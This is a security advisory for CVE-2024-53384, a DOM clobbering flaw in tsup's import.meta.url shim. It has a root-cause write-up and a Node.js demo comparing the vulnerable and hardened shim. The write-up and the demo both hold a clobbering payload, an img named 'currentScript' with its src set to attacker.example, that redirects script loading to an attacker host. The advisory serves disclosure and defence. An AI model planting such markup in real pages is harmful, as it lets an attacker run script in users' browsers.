
CVE-2024-53384: tsup DOM Clobbering vulnerability

CVSS Score
5.1 (CVSS v3.1)

Basic Information

EPSS Score
0.23629%
Published
3/3/2025
Updated
3/3/2025
KEV Status
No
Technology
JavaScript

Technical Details

CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Package Name
tsup
Ecosystem
npm
Vulnerable Versions
<= 8.3.4
First Patched Version
(none listed)

Vulnerability Intelligence

Miggo AI Root Cause Analysis

The vulnerability is in tsup's CommonJS shim for `import.meta.url`. When a bundle runs in a browser, the `getImportMetaUrl` function in `cjs_shims.js` takes the value of `document.currentScript.src` without checking that `document.currentScript` is actually a `<script>` element. Because `document` exposes named elements as properties, and those names shadow its built-in accessors, an attacker who can get markup into the page (for example `<img name='currentScript' src='https://attacker.example/x.js'>`) makes `document.currentScript` resolve to the injected element and its `src` to an attacker-chosen URL. Everything the bundle derives from `import.meta.url`, such as chunk, worker or asset URLs resolved relative to it, then points at the attacker's origin, which is how a markup-injection primitive escalates to loading attacker-controlled script. The GitHub Gist proof-of-concept and the accompanying technical analysis confirm that this matches known DOM Clobbering attack vectors. Note that the CVSS vector above rates the attack vector as Local; the practical precondition is the ability to inject HTML into a page that loads a tsup-built bundle, with no need for prior script execution.
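The clobbering path described above, as an added example that is neither tsup's code nor taken from this page: a Node.js model of the browser's named-property lookup on `document`, the vulnerable shim shape beside a hardened variant that only accepts a genuine `<script>` element, and the downstream effect on a worker URL resolved from `import.meta.url`. The `FakeElement`, `makeDocument`, `resolveAsset` and `demo` helpers and the hostnames are constructed for the demonstration.

```javascript
// Added example, not tsup's own code. It models the browser behaviour the
// advisory relies on so the two shim variants can be exercised under Node.js.
// In a real browser the Document interface is [LegacyOverrideBuiltIns]: an
// element carrying name="currentScript" is exposed as document.currentScript
// and shadows the built-in accessor. That is the clobbering step.

class FakeElement {
  constructor(tagName, attrs = {}) {
    this.tagName = tagName.toUpperCase(); // browsers report HTML tag names upper-cased
    Object.assign(this, attrs);
  }
}

// Constructed stand-in for a Document: a baseURI plus a currentScript getter
// that applies named-property precedence the way a browser does.
function makeDocument({ baseURI, runningScript, injectedElements = [] }) {
  const named = new Map();
  for (const el of injectedElements) {
    if (typeof el.name === 'string') named.set(el.name, el);
  }
  return {
    baseURI,
    get currentScript() {
      return named.get('currentScript') || runningScript;
    },
  };
}

// Vulnerable shape, mirroring the pattern the advisory describes: whatever
// document.currentScript resolves to is trusted and its .src is returned.
function getImportMetaUrlVulnerable(document) {
  return (
    (document.currentScript && document.currentScript.src) ||
    new URL('main.js', document.baseURI).href
  );
}

// Hardened shape: take .src only from a real <script> element. In a browser
// `cs instanceof HTMLScriptElement` is the equivalent check; a clobbering
// element can carry any name attribute but never the SCRIPT tag name.
function getImportMetaUrlHardened(document) {
  const cs = document.currentScript;
  const isScript =
    !!cs && typeof cs.tagName === 'string' && cs.tagName.toUpperCase() === 'SCRIPT';
  return (isScript && cs.src) || new URL('main.js', document.baseURI).href;
}

// Typical downstream use of import.meta.url in bundled code: resolve a chunk,
// worker or asset relative to the bundle's own URL.
function resolveAsset(importMetaUrl, relativePath) {
  return new URL(relativePath, importMetaUrl).href;
}

// Runs both shims against a clean page and a page with injected markup.
// Hostnames are made up for the demonstration.
function demo() {
  const runningScript = new FakeElement('script', { src: 'https://app.example/assets/bundle.js' });
  const baseURI = 'https://app.example/dashboard';

  const cleanDoc = makeDocument({ baseURI, runningScript });
  const clobberedDoc = makeDocument({
    baseURI,
    runningScript,
    // Markup an attacker could get rendered into the page, e.g. via a user
    // supplied field that strips <script> but keeps name attributes.
    injectedElements: [
      new FakeElement('img', { name: 'currentScript', src: 'https://attacker.example/evil.js' }),
    ],
  });

  const clobberedVulnerable = getImportMetaUrlVulnerable(clobberedDoc);
  return {
    cleanVulnerable: getImportMetaUrlVulnerable(cleanDoc),
    cleanHardened: getImportMetaUrlHardened(cleanDoc),
    clobberedVulnerable,
    clobberedHardened: getImportMetaUrlHardened(clobberedDoc),
    // Where new Worker(new URL('./worker.js', import.meta.url)) would load from
    workerFromVulnerable: resolveAsset(clobberedVulnerable, './worker.js'),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

On the clobbered page the vulnerable shim hands back `https://attacker.example/evil.js`, so a worker or chunk resolved against it is fetched from the attacker's origin; the hardened shim ignores the `<img>` and falls back to the `main.js` URL under the page's own base, which is the shim's existing fallback and keeps the bundle on its own origin.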

WAF Protection Rules

WAF Rule

A DOM Clobbering vulnerability in tsup v8.3.4 allows attackers to execute arbitrary code via a crafted script in the import.meta.url to document.currentScript in cjs_shims.js components

Reasoning

The vulnerability stems from tsup's handling of `import.meta.url` in browser contexts. The `getImportMetaUrl` function in `cjs_shims.js` directly references `document.currentScript.src`, which can be clobbered by attacker-controlled DOM elements (e.g., `<img name='currentScript'>`).